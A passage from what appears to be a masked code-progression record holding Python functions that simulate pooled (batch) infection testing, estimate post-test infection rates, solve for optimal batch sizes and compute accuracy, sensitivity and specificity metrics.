results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n return tn / (tn + fp)\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\n<mask token>\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error,\n typeI_error, parallel_num, ind_repeat, seq):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(\n subject_array) / batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in temp_batch[:, 1]:\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch,\n typeII_error, typeI_error, repeat=ind_repeat, seq=seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, batch_consum + individual_con, individual_con\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-3": "<mask token>\n\n\n@jit(parallel=True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat=1,\n seq=True):\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n if seq == True:\n consum = 0\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i, 1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, consum\n else:\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat / 2 else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * repeat\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\n<mask token>\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array) / batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in temp_batch[:, 1]:\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n return neg_batch, pos_batch, test_consum\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n return tn / (tn + fp)\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\ndef test_result(data, seq_test, **kwargs):\n \"\"\"\n a helper function provides convenient results for a given test method with its **kwargs\n\n Input:\n data (array or list of arrays)\n seq_test (test_method object): could be seq_test, matrix_test and other test_method objects\n Output:\n result (DataFrame): a dataframe contains important evaluation metrics for the test method \n \"\"\"\n if isinstance(data, list) == False:\n pred, consum, ind_con = seq_test(data, **kwargs)\n result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':\n recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score\n (data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],\n pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),\n 'test_consum': consum, 'ind_consum': ind_con, 'batch_consum': \n consum - ind_con}\n return result\n else:\n length = len(data)\n acc = np.zeros(length)\n sens = np.zeros(length)\n spec = np.zeros(length)\n ppv = np.zeros(length)\n npv = np.zeros(length)\n test_consum = np.zeros(length)\n ind_consum = np.zeros(length)\n batch_consum = np.zeros(length)\n for i in range(length):\n pred, consum, ind_con = seq_test(data[i], **kwargs)\n acc[i] = np.mean(pred[:, 1] == data[i][:, 1])\n sens[i] = recall_score(data[i][:, 1], pred[:, 1])\n spec[i] = specificity_score(data[i][:, 1], pred[:, 1])\n ppv[i] = precision_score(data[i][:, 1], pred[:, 1])\n npv[i] = npv_score(data[i][:, 1], pred[:, 1])\n test_consum[i] = consum\n ind_consum[i] = ind_con\n batch_consum[i] = consum - ind_con\n result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':\n npv, 'test_consum': test_consum, 'ind_consum': ind_consum,\n 'batch_consum': batch_consum}\n return pd.DataFrame(result)\n\n\n<mask token>\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error,\n typeI_error, parallel_num, ind_repeat, seq):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(\n subject_array) / batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in temp_batch[:, 1]:\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch,\n typeII_error, typeI_error, repeat=ind_repeat, seq=seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, batch_consum + individual_con, individual_con\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = 